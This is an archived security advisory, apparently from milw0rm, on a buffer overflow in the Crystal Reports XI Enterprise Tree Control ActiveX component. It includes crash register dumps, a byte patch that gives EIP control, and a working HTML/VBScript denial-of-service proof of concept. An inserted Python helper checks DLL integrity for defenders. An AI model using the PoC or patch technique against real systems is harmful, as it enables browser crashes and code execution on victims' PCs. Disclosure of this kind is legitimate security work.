Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS

Document Sample
Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS Powered By Docstoc
					                   Crystal Reports XI Release 2 Enterprise Tree Control ActiveX BOFDoS         Page 1/4
#####################################################################################

Application:  Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/DoS
              www.businessobjects.com
Versions:     11
Platforms:    Windows XP Professional
Bug:          buffer-overflow
Exploitation: remote
Date:         2007-01-16

Author:        shinnai
               e-mail: shinnai[at]autistici[dot]org
               web:    http://shinnai.altervista.org

#####################################################################################

1)   Introduction
2)   Technical details and bug
3)   The Code
4)   Fix

#####################################################################################

===============
1) Introduction
===============

This component is used to display reports created with Crystal Reports
on the web.

#####################################################################################

============================
2) Technical details and bug
============================

Name:     EnterpriseControls.dll
Ver.:     11.5.0.313
CLSID:    {3D58C9F3-7CA5-4C44-9D62-C5B63E059050}
MD5:      179e2dc7f9f6e9d6e0210e89c623fd72

Marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
The problem is a buffer overflow which occurs when you use the
"SelectedSession()" method.
It seems that, during the initialization of the component, a race
condition occurs between threads and 4 bytes of the same component
will overwrite EIP.
If you patch these 4 bytes, you can control this register, using
it to jump to a shellcode and execute arbitrary code on the user's PC.
For exploiting this vulnerability you only need to create a web
page containing the CLSID and the codebase path to your crafted
ActiveX.
These are the registers using the original file:
14:59:34.126 pid=1468 tid=1250 EXCEPTION (first-chance)
             ----------------------------------------------------------------
             Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
             ----------------------------------------------------------------
             EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
             EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
             ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
             EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
             ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
             EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
             EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                           --> N/A
             ----------------------------------------------------------------

14:59:34.142 pid=1468 tid=1250 EXCEPTION (unhandled)
             ----------------------------------------------------------------
             Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
             ----------------------------------------------------------------
             EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
             EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
             ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
             EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
             ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
             EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
             EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                           --> N/A
             ----------------------------------------------------------------

We'll find these 4 bytes at this address:
0x000172D8 "28 E9 7D FF"...

Using a hex editor to change them to:
0x000172D8 "42 42 42 42"...

we'll have:

C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll

Different, Left is newer 4 bytes differ
================================================================================
000172D0 87 FF FF FF 83 6C 24 04 .....l$.     87 FF FF FF 83 6C 24 04 .....l$.
000172D8 <42 42 42 42>FF FF 83 6C BBBB...l <28 E9 7D FF>FF FF 83 6C (.}....l
000172E0 24 04 2C E9               $.,.       24 04 2C E9              $.,.
================================================================================

File Count Summary
   Identical:        0   files
   Near Identical:   0   files
   Different:        1   files
   Left Only:        0   files
   Right Only:       0   files
   Errors:           0   files
   Total:            1   files

Byte Count Summary
   Matched:    4 bytes differ
   Left Only:  0 bytes
   Right Only: 0 bytes
   Total:      4 bytes

and the register values will be:
15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first-chance)
             ----------------------------------------------------------------
             Exception C0000005 (ACCESS_VIOLATION reading [42424242])
             ----------------------------------------------------------------
             EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
             EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
             ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
             EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
             ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
             EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
             EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                           --> N/A
             ----------------------------------------------------------------

15:05:38.978 pid=12D4 tid=1240 EXCEPTION (unhandled)
             ----------------------------------------------------------------
             Exception C0000005 (ACCESS_VIOLATION reading [42424242])
             ----------------------------------------------------------------
             EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
             EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
             ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
             ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
             EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
             ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
             EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
             EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                           --> N/A
             ----------------------------------------------------------------

isn't it fun?
Naturally, the EIP overwrite requires that someone uses the crafted dll; otherwise
you can just enjoy a crash of the application.

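As an added example (not part of the advisory), here is a Python helper that does two defender-side checks with the data above: it parses the register dump to confirm that EIP is exactly the little-endian dword at EAX+4 (the "28 E9 7D FF" the advisory locates at file offset 0x172D8), and it checks a copy of EnterpriseControls.dll for those original bytes and for the advisory's MD5, so a tampered DLL of the kind described can be recognised. The DLL image below is a constructed zero-filled stand-in carrying only the bytes from the bindiff listing, not the real file.

```python
import hashlib
import re
import struct

# Values taken from the advisory: MD5 of the shipped DLL, the file offset of the
# 4 bytes that end up in EIP, and their original content.
ADVISORY_MD5 = "179e2dc7f9f6e9d6e0210e89c623fd72"
PATCH_OFFSET = 0x000172D8
ORIGINAL_BYTES = bytes.fromhex("28E97DFF")

# Register lines copied from the advisory's crash dumps (original and patched DLL).
ORIGINAL_DUMP = """
EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
"""
PATCHED_DUMP = """
EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
"""
REG_LINE = re.compile(r"^\s*(E[A-Z]{2})=([0-9A-F]{8}):\s*([0-9A-F? -]+)$", re.M)

def parse_dump(text):
    """Map each 'REG=VALUE: 16 bytes' line to (value, bytes or None if unreadable)."""
    regs = {}
    for name, value, data in REG_LINE.findall(text):
        tokens = data.replace("-", " ").split()
        regs[name] = (int(value, 16), None if "??" in tokens else bytes.fromhex("".join(tokens)))
    return regs

def find_eip_source(regs):
    """Return (register, offset) whose dumped memory holds EIP as a little-endian dword."""
    eip = regs["EIP"][0]
    for name, (_, mem) in regs.items():
        for off in range(0, len(mem or b"") - 3):
            if struct.unpack_from("<I", mem, off)[0] == eip:
                return name, off
    return None

def check_patch_site(image, offset=PATCH_OFFSET, expected=ORIGINAL_BYTES):
    """Integrity check for a DLL copy: original bytes at the patch site, and advisory MD5?"""
    found = bytes(image[offset:offset + len(expected)])
    return {"found": found.hex().upper(), "intact": found == expected,
            "md5_matches_advisory": hashlib.md5(image).hexdigest() == ADVISORY_MD5}

def constructed_image(patched=False):
    """Constructed stand-in for the DLL (not the real file): zeros plus the bindiff bytes."""
    img = bytearray(0x172E4)
    site = b"BBBB" if patched else ORIGINAL_BYTES
    img[0x172D0:0x172E4] = bytes.fromhex("87FFFFFF836C2404") + site + bytes.fromhex("FFFF836C24042CE9")
    return bytes(img)
```

Run against a real copy of the DLL, check_patch_site() reports "intact": False for the patched build from the bindiff listing and "md5_matches_advisory": False for anything other than the shipped 11.5.0.313 file.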
#####################################################################################

===========
3) The Code
===========

I will release a public exploit but, this time, no code execution ;-)
Everything I could say is that you can directly inject your shellcode into the dll
or pass an argument to the "SelectedSession()" method and then jump to the shellcode.

PoC (DoS):

<html>
 <object classid='clsid:3D58C9F3-7CA5-4C44-9D62-C5B63E059050' id='test'></object>
  <script language = 'vbscript'>
   test.SelectedSession = ""
  </script>
</html>

#####################################################################################

======
4) Fix
======

No fix

#####################################################################################

# milw0rm.com [2008-01-17]
shinnai                                                                                         01/17/2008